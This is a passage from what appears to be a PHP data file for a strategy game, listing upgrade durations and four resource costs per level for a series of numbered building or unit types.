array ('time_consume' => 74880, 'resources' => array( '1' => 8485, '2' => 6280, '3' => 7035, '4' => 2160)),

array ('time_consume' => 82080, 'resources' => array( '1' => 9160, '2' => 6775, '3' => 7595, '4' => 2330)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9820, '2' => 7265, '3' => 8140, '4' => 2500)),

array ('time_consume' => 96480, 'resources' => array( '1' => 10470, '2' => 7745, '3' => 8680, '4' => 2665)),

array ('time_consume' => 103680, 'resources' => array( '1' => 11110, '2' => 8215, '3' => 9210, '4' => 2830)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11740, '2' => 8685, '3' => 9730, '4' => 2990)),

array ('time_consume' => 118080, 'resources' => array( '1' => 12360, '2' => 9145, '3' => 10245, '4' => 3145)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12975, '2' => 9600, '3' => 10755, '4' => 3305)),

array ('time_consume' => 132480, 'resources' => array( '1' => 13580, '2' => 10045, '3' => 11260, '4' => 3460)),

array ('time_consume' => 139680, 'resources' => array( '1' => 14180, '2' => 10490, '3' => 11755, '4' => 3610)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14775, '2' => 10930, '3' => 12250, '4' => 3765)),


'16'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1085, '2' => 1235, '3' => 1185, '4' => 240)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1885, '2' => 2150, '3' => 2065, '4' => 420)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2610, '2' => 2975, '3' => 2860, '4' => 580)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3285, '2' => 3745, '3' => 3595, '4' => 730)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3925, '2' => 4475, '3' => 4300, '4' => 870)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4540, '2' => 5180, '3' => 4975, '4' => 1005)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5140, '2' => 5860, '3' => 5630, '4' => 1140)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5720, '2' => 6520, '3' => 6265, '4' => 1265)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6285, '2' => 7160, '3' => 6880, '4' => 1390)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6835, '2' => 7790, '3' => 7485, '4' => 1515)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7375, '2' => 8410, '3' => 8080, '4' => 1635)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7910, '2' => 9015, '3' => 8665, '4' => 1750)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8430, '2' => 9610, '3' => 9235, '4' => 1870)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8945, '2' => 10200, '3' => 9800, '4' => 1980)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9455, '2' => 10780, '3' => 10355, '4' => 2095)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9955, '2' => 11350, '3' => 10905, '4' => 2205)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10450, '2' => 11915, '3' => 11445, '4' => 2315)),

array ('time_consume' => 132480, 'resources' => array( '1' => 10940, '2' => 12470, '3' => 11980, '4' => 2425)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11425, '2' => 13020, '3' => 12510, '4' => 2530)),

array ('time_consume' => 146880, 'resources' => array( '1' => 11900, '2' => 13565, '3' => 13035, '4' => 2635)),


'17'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 2365, '2' => 735, '3' => 885, '4' => 215)),

array ('time_consume' => 17280, 'resources' => array( '1' => 4120, '2' => 1275, '3' => 1540, '4' => 375)),

array ('time_consume' => 24480, 'resources' => array( '1' => 5700, '2' => 1765, '3' => 2125, '4' => 520)),

array ('time_consume' => 31680, 'resources' => array( '1' => 7175, '2' => 2225, '3' => 2680, '4' => 655)),

array ('time_consume' => 38880, 'resources' => array( '1' => 8575, '2' => 2660, '3' => 3200, '4' => 785)),

array ('time_consume' => 46080, 'resources' => array( '1' => 9925, '2' => 3075, '3' => 3705, '4' => 910)),

array ('time_consume' => 53280, 'resources' => array( '1' => 11225, '2' => 3480, '3' => 4190, '4' => 1030)),

array ('time_consume' => 60480, 'resources' => array( '1' => 12490, '2' => 3870, '3' => 4660, '4' => 1145)),

array ('time_consume' => 67680, 'resources' => array( '1' => 13725, '2' => 4255, '3' => 5125, '4' => 1255)),

array ('time_consume' => 74880, 'resources' => array( '1' => 14935, '2' => 4625, '3' => 5575, '4' => 1365)),

array ('time_consume' => 82080, 'resources' => array( '1' => 16115, '2' => 4995, '3' => 6015, '4' => 1475)),

array ('time_consume' => 89280, 'resources' => array( '1' => 17280, '2' => 5355, '3' => 6450, '4' => 1580)),

array ('time_consume' => 96480, 'resources' => array( '1' => 18420, '2' => 5710, '3' => 6875, '4' => 1685)),

array ('time_consume' => 103680, 'resources' => array( '1' => 19545, '2' => 6055, '3' => 7295, '4' => 1790)),

array ('time_consume' => 110880, 'resources' => array( '1' => 20655, '2' => 6400, '3' => 7710, '4' => 1890)),

array ('time_consume' => 118080, 'resources' => array( '1' => 21750, '2' => 6740, '3' => 8115, '4' => 1990)),

array ('time_consume' => 125280, 'resources' => array( '1' => 22830, '2' => 7075, '3' => 8520, '4' => 2090)),

array ('time_consume' => 132480, 'resources' => array( '1' => 23900, '2' => 7405, '3' => 8920, '4' => 2190)),

array ('time_consume' => 139680, 'resources' => array( '1' => 24955, '2' => 7730, '3' => 9315, '4' => 2285)),

array ('time_consume' => 146880, 'resources' => array( '1' => 26000, '2' => 8055, '3' => 9705, '4' => 2380)),


'18'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1065, '2' => 1415, '3' => 735, '4' => 95)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1855, '2' => 2465, '3' => 1275, '4' => 170)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2570, '2' => 3410, '3' => 1765, '4' => 235)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3235, '2' => 4295, '3' => 2225, '4' => 295)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3865, '2' => 5135, '3' => 2660, '4' => 350)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4470, '2' => 5940, '3' => 3075, '4' => 405)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5060, '2' => 6720, '3' => 3480, '4' => 460)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5630, '2' => 7475, '3' => 3870, '4' => 510)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6185, '2' => 8215, '3' => 4255, '4' => 560)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6730, '2' => 8940, '3' => 4625, '4' => 610)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7265, '2' => 9645, '3' => 4995, '4' => 660)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7785, '2' => 10340, '3' => 5355, '4' => 705)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8300, '2' => 11025, '3' => 5710, '4' => 750)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8810, '2' => 11700, '3' => 6055, '4' => 800)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9310, '2' => 12365, '3' => 6400, '4' => 845)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9800, '2' => 13020, '3' => 6740, '4' => 890)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10290, '2' => 13665, '3' => 7075, '4' => 930)),

array ('time_consume' => 132480, 'resources' => array( '1' => 10770, '2' => 14305, '3' => 7405, '4' => 975)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11245, '2' => 14935, '3' => 7730, '4' => 1020)),

array ('time_consume' => 146880, 'resources' => array( '1' => 11720, '2' => 15565, '3' => 8055, '4' => 1060)),


'21'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 800, '2' => 1010, '3' => 585, '4' => 370)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1395, '2' => 1760, '3' => 1020, '4' => 645)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1925, '2' => 2430, '3' => 1410, '4' => 890)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2425, '2' => 3060, '3' => 1775, '4' => 1120)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2900, '2' => 3660, '3' => 2120, '4' => 1340)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3355, '2' => 4235, '3' => 2455, '4' => 1550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3795, '2' => 4790, '3' => 2775, '4' => 1755)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4220, '2' => 5330, '3' => 3090, '4' => 1955)),

array ('time_consume' => 67680, 'resources' => array( '1' => 4640, '2' => 5860, '3' => 3395, '4' => 2145)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5050, '2' => 6375, '3' => 3690, '4' => 2335)),

array ('time_consume' => 82080, 'resources' => array( '1' => 5450, '2' => 6880, '3' => 3985, '4' => 2520)),

array ('time_consume' => 89280, 'resources' => array( '1' => 5840, '2' => 7375, '3' => 4270, '4' => 2700)),

array ('time_consume' => 96480, 'resources' => array( '1' => 6225, '2' => 7860, '3' => 4555, '4' => 2880)),

array ('time_consume' => 103680, 'resources' => array( '1' => 6605, '2' => 8340, '3' => 4830, '4' => 3055)),

array ('time_consume' => 110880, 'resources' => array( '1' => 6980, '2' => 8815, '3' => 5105, '4' => 3230)),

array ('time_consume' => 118080, 'resources' => array( '1' => 7350, '2' => 9280, '3' => 5375, '4' => 3400)),

array ('time_consume' => 125280, 'resources' => array( '1' => 7715, '2' => 9745, '3' => 5645, '4' => 3570)),

array ('time_consume' => 132480, 'resources' => array( '1' => 8080, '2' => 10200, '3' => 5905, '4' => 3735)),

array ('time_consume' => 139680, 'resources' => array( '1' => 8435, '2' => 10650, '3' => 6170, '4' => 3900)),

array ('time_consume' => 146880, 'resources' => array( '1' => 8790, '2' => 11095, '3' => 6425, '4' => 4065)),


'22'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1080, '2' => 1150, '3' => 1495, '4' => 580)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1880, '2' => 2000, '3' => 2605, '4' => 1010)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2600, '2' => 2770, '3' => 3600, '4' => 1395)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3275, '2' => 3485, '3' => 4530, '4' => 1760)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3915, '2' => 4165, '3' => 5420, '4' => 2100)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4530, '2' => 4820, '3' => 6270, '4' => 2430)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5125, '2' => 5455, '3' => 7090, '4' => 2750)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5700, '2' => 6070, '3' => 7890, '4' => 3060)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6265, '2' => 6670, '3' => 8670, '4' => 3365)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6815, '2' => 7255, '3' => 9435, '4' => 3660)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7355, '2' => 7830, '3' => 10180, '4' => 3950)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7885, '2' => 8395, '3' => 10915, '4' => 4235)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8405, '2' => 8950, '3' => 11635, '4' => 4515)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8920, '2' => 9495, '3' => 12345, '4' => 4790)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9425, '2' => 10035, '3' => 13045, '4' => 5060)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9925, '2' => 10570, '3' => 13740, '4' => 5330)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10420, '2' => 11095, '3' => 14420, '4' => 5595)),

array ('time_consume' => 132480, 'resources' => array( '1' => 10905, '2' => 11610, '3' => 15095, '4' => 5855)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11385, '2' => 12125, '3' => 15765, '4' => 6115)),

array ('time_consume' => 146880, 'resources' => array( '1' => 11865, '2' => 12635, '3' => 16425, '4' => 6370)),


'23'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 645, '2' => 575, '3' => 170, '4' => 220)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1125, '2' => 1000, '3' => 295, '4' => 385)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1555, '2' => 1385, '3' => 410, '4' => 530)),

array ('time_consume' => 31680, 'resources' => array( '1' => 1955, '2' => 1745, '3' => 515, '4' => 665)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2335, '2' => 2085, '3' => 615, '4' => 795)),

array ('time_consume' => 46080, 'resources' => array( '1' => 2705, '2' => 2410, '3' => 715, '4' => 920)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3060, '2' => 2725, '3' => 805, '4' => 1045)),

array ('time_consume' => 60480, 'resources' => array( '1' => 3405, '2' => 3035, '3' => 895, '4' => 1160)),

array ('time_consume' => 67680, 'resources' => array( '1' => 3740, '2' => 3335, '3' => 985, '4' => 1275)),

array ('time_consume' => 74880, 'resources' => array( '1' => 4070, '2' => 3630, '3' => 1075, '4' => 1390)),

array ('time_consume' => 82080, 'resources' => array( '1' => 4390, '2' => 3915, '3' => 1160, '4' => 1500)),

array ('time_consume' => 89280, 'resources' => array( '1' => 4710, '2' => 4200, '3' => 1240, '4' => 1605)),

array ('time_consume' => 96480, 'resources' => array( '1' => 5020, '2' => 4475, '3' => 1325, '4' => 1710)),

array ('time_consume' => 103680, 'resources' => array( '1' => 5325, '2' => 4750, '3' => 1405, '4' => 1815)),

array ('time_consume' => 110880, 'resources' => array( '1' => 5630, '2' => 5020, '3' => 1485, '4' => 1920)),

array ('time_consume' => 118080, 'resources' => array( '1' => 5925, '2' => 5285, '3' => 1560, '4' => 2020)),

array ('time_consume' => 125280, 'resources' => array( '1' => 6220, '2' => 5545, '3' => 1640, '4' => 2120)),

array ('time_consume' => 132480, 'resources' => array( '1' => 6515, '2' => 5805, '3' => 1715, '4' => 2220)),

array ('time_consume' => 139680, 'resources' => array( '1' => 6800, '2' => 6065, '3' => 1790, '4' => 2320)),

array ('time_consume' => 146880, 'resources' => array( '1' => 7085, '2' => 6315, '3' => 1870, '4' => 2415)),


'24'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1275, '2' => 1625, '3' => 905, '4' => 290)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2220, '2' => 2830, '3' => 1575, '4' => 505)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3070, '2' => 3915, '3' => 2180, '4' => 700)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3865, '2' => 4925, '3' => 2745, '4' => 880)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4620, '2' => 5890, '3' => 3280, '4' => 1050)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5345, '2' => 6815, '3' => 3795, '4' => 1215)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6050, '2' => 7710, '3' => 4295, '4' => 1375)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6730, '2' => 8575, '3' => 4775, '4' => 1530)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7395, '2' => 9425, '3' => 5250, '4' => 1680)),

array ('time_consume' => 74880, 'resources' => array( '1' => 8045, '2' => 10255, '3' => 5710, '4' => 1830)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8680, '2' => 11065, '3' => 6165, '4' => 1975)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9310, '2' => 11865, '3' => 6605, '4' => 2115)),

array ('time_consume' => 96480, 'resources' => array( '1' => 9925, '2' => 12650, '3' => 7045, '4' => 2255)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10530, '2' => 13420, '3' => 7475, '4' => 2395)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11125, '2' => 14180, '3' => 7900, '4' => 2530)),

array ('time_consume' => 118080, 'resources' => array( '1' => 11715, '2' => 14935, '3' => 8315, '4' => 2665)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12300, '2' => 15675, '3' => 8730, '4' => 2795)),

array ('time_consume' => 132480, 'resources' => array( '1' => 12875, '2' => 16410, '3' => 9140, '4' => 2930)),

array ('time_consume' => 139680, 'resources' => array( '1' => 13445, '2' => 17135, '3' => 9540, '4' => 3060)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14005, '2' => 17850, '3' => 9940, '4' => 3185)),


'25'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1310, '2' => 1205, '3' => 1080, '4' => 500)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2280, '2' => 2100, '3' => 1880, '4' => 870)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3155, '2' => 2900, '3' => 2600, '4' => 1205)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3970, '2' => 3655, '3' => 3275, '4' => 1515)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4745, '2' => 4365, '3' => 3915, '4' => 1810)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5495, '2' => 5055, '3' => 4530, '4' => 2095)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6215, '2' => 5715, '3' => 5125, '4' => 2370)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6915, '2' => 6360, '3' => 5700, '4' => 2640)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7595, '2' => 6990, '3' => 6265, '4' => 2900)),

array ('time_consume' => 74880, 'resources' => array( '1' => 8265, '2' => 7605, '3' => 6815, '4' => 3155)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8920, '2' => 8205, '3' => 7355, '4' => 3405)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9565, '2' => 8795, '3' => 7885, '4' => 3650)),

array ('time_consume' => 96480, 'resources' => array( '1' => 10195, '2' => 9380, '3' => 8405, '4' => 3890)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10820, '2' => 9950, '3' => 8920, '4' => 4130)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11435, '2' => 10515, '3' => 9425, '4' => 4365)),

array ('time_consume' => 118080, 'resources' => array( '1' => 12040, '2' => 11075, '3' => 9925, '4' => 4595)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12635, '2' => 11625, '3' => 10420, '4' => 4825)),

array ('time_consume' => 132480, 'resources' => array( '1' => 13230, '2' => 12170, '3' => 10905, '4' => 5050)),

array ('time_consume' => 139680, 'resources' => array( '1' => 13815, '2' => 12705, '3' => 11385, '4' => 5270)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14390, '2' => 13240, '3' => 11865, '4' => 5495)),


'26'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1200, '2' => 1480, '3' => 1640, '4' => 450)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2090, '2' => 2575, '3' => 2860, '4' => 785)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2890, '2' => 3565, '3' => 3955, '4' => 1085)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3640, '2' => 4485, '3' => 4975, '4' => 1365)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4350, '2' => 5365, '3' => 5950, '4' => 1630)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5030, '2' => 6205, '3' => 6885, '4' => 1885)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5690, '2' => 7020, '3' => 7785, '4' => 2135)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6335, '2' => 7810, '3' => 8665, '4' => 2375)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6960, '2' => 8585, '3' => 9520, '4' => 2610)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7570, '2' => 9340, '3' => 10360, '4' => 2840)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8170, '2' => 10080, '3' => 11180, '4' => 3065)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8760, '2' => 10805, '3' => 11985, '4' => 3285)),

array ('time_consume' => 96480, 'resources' => array( '1' => 9340, '2' => 11520, '3' => 12775, '4' => 3500)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9910, '2' => 12225, '3' => 13560, '4' => 3715)),

array ('time_consume' => 110880, 'resources' => array( '1' => 10475, '2' => 12915, '3' => 14325, '4' => 3925)),

array ('time_consume' => 118080, 'resources' => array( '1' => 11030, '2' => 13600, '3' => 15085, '4' => 4135)),

array ('time_consume' => 125280, 'resources' => array( '1' => 11575, '2' => 14275, '3' => 15835, '4' => 4340)),

array ('time_consume' => 132480, 'resources' => array( '1' => 12115, '2' => 14945, '3' => 16575, '4' => 4545)),

array ('time_consume' => 139680, 'resources' => array( '1' => 12655, '2' => 15605, '3' => 17310, '4' => 4745)),

array ('time_consume' => 146880, 'resources' => array( '1' => 13185, '2' => 16260, '3' => 18035, '4' => 4945)),


'27'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 2250, '2' => 1330, '3' => 835, '4' => 230)),

array ('time_consume' => 17280, 'resources' => array( '1' => 3915, '2' => 2315, '3' => 1455, '4' => 400)),

array ('time_consume' => 24480, 'resources' => array( '1' => 5420, '2' => 3200, '3' => 2015, '4' => 550)),

array ('time_consume' => 31680, 'resources' => array( '1' => 6820, '2' => 4025, '3' => 2535, '4' => 690)),

array ('time_consume' => 38880, 'resources' => array( '1' => 8155, '2' => 4815, '3' => 3030, '4' => 825)),

array ('time_consume' => 46080, 'resources' => array( '1' => 9435, '2' => 5570, '3' => 3510, '4' => 955)),

array ('time_consume' => 53280, 'resources' => array( '1' => 10670, '2' => 6300, '3' => 3970, '4' => 1085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 11875, '2' => 7010, '3' => 4415, '4' => 1205)),

array ('time_consume' => 67680, 'resources' => array( '1' => 13050, '2' => 7705, '3' => 4850, '4' => 1325)),

array ('time_consume' => 74880, 'resources' => array( '1' => 14195, '2' => 8380, '3' => 5280, '4' => 1440)),

array ('time_consume' => 82080, 'resources' => array( '1' => 15320, '2' => 9045, '3' => 5695, '4' => 1555)),

array ('time_consume' => 89280, 'resources' => array( '1' => 16425, '2' => 9695, '3' => 6110, '4' => 1665)),

array ('time_consume' => 96480, 'resources' => array( '1' => 17510, '2' => 10340, '3' => 6510, '4' => 1775)),

array ('time_consume' => 103680, 'resources' => array( '1' => 18580, '2' => 10970, '3' => 6910, '4' => 1885)),

array ('time_consume' => 110880, 'resources' => array( '1' => 19635, '2' => 11595, '3' => 7300, '4' => 1995)),

array ('time_consume' => 118080, 'resources' => array( '1' => 20675, '2' => 12205, '3' => 7690, '4' => 2100)),

array ('time_consume' => 125280, 'resources' => array( '1' => 21705, '2' => 12815, '3' => 8070, '4' => 2205)),

array ('time_consume' => 132480, 'resources' => array( '1' => 22720, '2' => 13415, '3' => 8450, '4' => 2305)),

array ('time_consume' => 139680, 'resources' => array( '1' => 23725, '2' => 14005, '3' => 8820, '4' => 2410)),

array ('time_consume' => 146880, 'resources' => array( '1' => 24720, '2' => 14595, '3' => 9190, '4' => 2510)),


'28'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1135, '2' => 1710, '3' => 770, '4' => 130)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1980, '2' => 2975, '3' => 1340, '4' => 230)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2735, '2' => 4115, '3' => 1850, '4' => 315)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3445, '2' => 5180, '3' => 2330, '4' => 400)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4120, '2' => 6190, '3' => 2785, '4' => 475)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4765, '2' => 7165, '3' => 3220, '4' => 550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5390, '2' => 8105, '3' => 3645, '4' => 625)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6000, '2' => 9015, '3' => 4055, '4' => 695)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6590, '2' => 9910, '3' => 4455, '4' => 765)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7170, '2' => 10780, '3' => 4850, '4' => 830)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7740, '2' => 11635, '3' => 5230, '4' => 895)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8300, '2' => 12470, '3' => 5610, '4' => 960)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8845, '2' => 13295, '3' => 5980, '4' => 1025)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9385, '2' => 14110, '3' => 6345, '4' => 1085)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9920, '2' => 14910, '3' => 6705, '4' => 1150)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10445, '2' => 15700, '3' => 7060, '4' => 1210)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10965, '2' => 16480, '3' => 7410, '4' => 1270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11480, '2' => 17250, '3' => 7760, '4' => 1330)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11985, '2' => 18015, '3' => 8100, '4' => 1390)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12485, '2' => 18765, '3' => 8440, '4' => 1445)),


'51'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 940, '2' => 800, '3' => 1250, '4' => 370)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1635, '2' => 1395, '3' => 2175, '4' => 645)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2265, '2' => 1925, '3' => 3010, '4' => 890)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2850, '2' => 2425, '3' => 3790, '4' => 1120)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3405, '2' => 2900, '3' => 4530, '4' => 1340)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3940, '2' => 3355, '3' => 5240, '4' => 1550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4460, '2' => 3795, '3' => 5930, '4' => 1755)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4960, '2' => 4220, '3' => 6600, '4' => 1955)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5450, '2' => 4640, '3' => 7250, '4' => 2145)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5930, '2' => 5050, '3' => 7885, '4' => 2335)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6400, '2' => 5450, '3' => 8510, '4' => 2520)),

array ('time_consume' => 89280, 'resources' => array( '1' => 6860, '2' => 5840, '3' => 9125, '4' => 2700)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7315, '2' => 6225, '3' => 9730, '4' => 2880)),

array ('time_consume' => 103680, 'resources' => array( '1' => 7765, '2' => 6605, '3' => 10325, '4' => 3055)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8205, '2' => 6980, '3' => 10910, '4' => 3230)),

array ('time_consume' => 118080, 'resources' => array( '1' => 8640, '2' => 7350, '3' => 11485, '4' => 3400)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9065, '2' => 7715, '3' => 12060, '4' => 3570)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9490, '2' => 8080, '3' => 12620, '4' => 3735)),

array ('time_consume' => 139680, 'resources' => array( '1' => 9910, '2' => 8435, '3' => 13180, '4' => 3900)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10325, '2' => 8790, '3' => 13730, '4' => 4065)),


'52'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 800, '2' => 1010, '3' => 1320, '4' => 650)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1395, '2' => 1760, '3' => 2300, '4' => 1130)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1925, '2' => 2430, '3' => 3180, '4' => 1565)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2425, '2' => 3060, '3' => 4000, '4' => 1970)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2900, '2' => 3660, '3' => 4785, '4' => 2355)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3355, '2' => 4235, '3' => 5535, '4' => 2725)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3795, '2' => 4790, '3' => 6260, '4' => 3085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4220, '2' => 5330, '3' => 6965, '4' => 3430)),

array ('time_consume' => 67680, 'resources' => array( '1' => 4640, '2' => 5860, '3' => 7655, '4' => 3770)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5050, '2' => 6375, '3' => 8330, '4' => 4100)),

array ('time_consume' => 82080, 'resources' => array( '1' => 5450, '2' => 6880, '3' => 8990, '4' => 4425)),

array ('time_consume' => 89280, 'resources' => array( '1' => 5840, '2' => 7375, '3' => 9635, '4' => 4745)),

array ('time_consume' => 96480, 'resources' => array( '1' => 6225, '2' => 7860, '3' => 10275, '4' => 5060)),

array ('time_consume' => 103680, 'resources' => array( '1' => 6605, '2' => 8340, '3' => 10900, '4' => 5370)),

array ('time_consume' => 110880, 'resources' => array( '1' => 6980, '2' => 8815, '3' => 11520, '4' => 5675)),

array ('time_consume' => 118080, 'resources' => array( '1' => 7350, '2' => 9280, '3' => 12130, '4' => 5975)),

array ('time_consume' => 125280, 'resources' => array( '1' => 7715, '2' => 9745, '3' => 12735, '4' => 6270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 8080, '2' => 10200, '3' => 13330, '4' => 6565)),

array ('time_consume' => 139680, 'resources' => array( '1' => 8435, '2' => 10650, '3' => 13920, '4' => 6855)),

array ('time_consume' => 146880, 'resources' => array( '1' => 8790, '2' => 11095, '3' => 14500, '4' => 7140)),


'53'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1150, '2' => 1220, '3' => 1670, '4' => 720)),

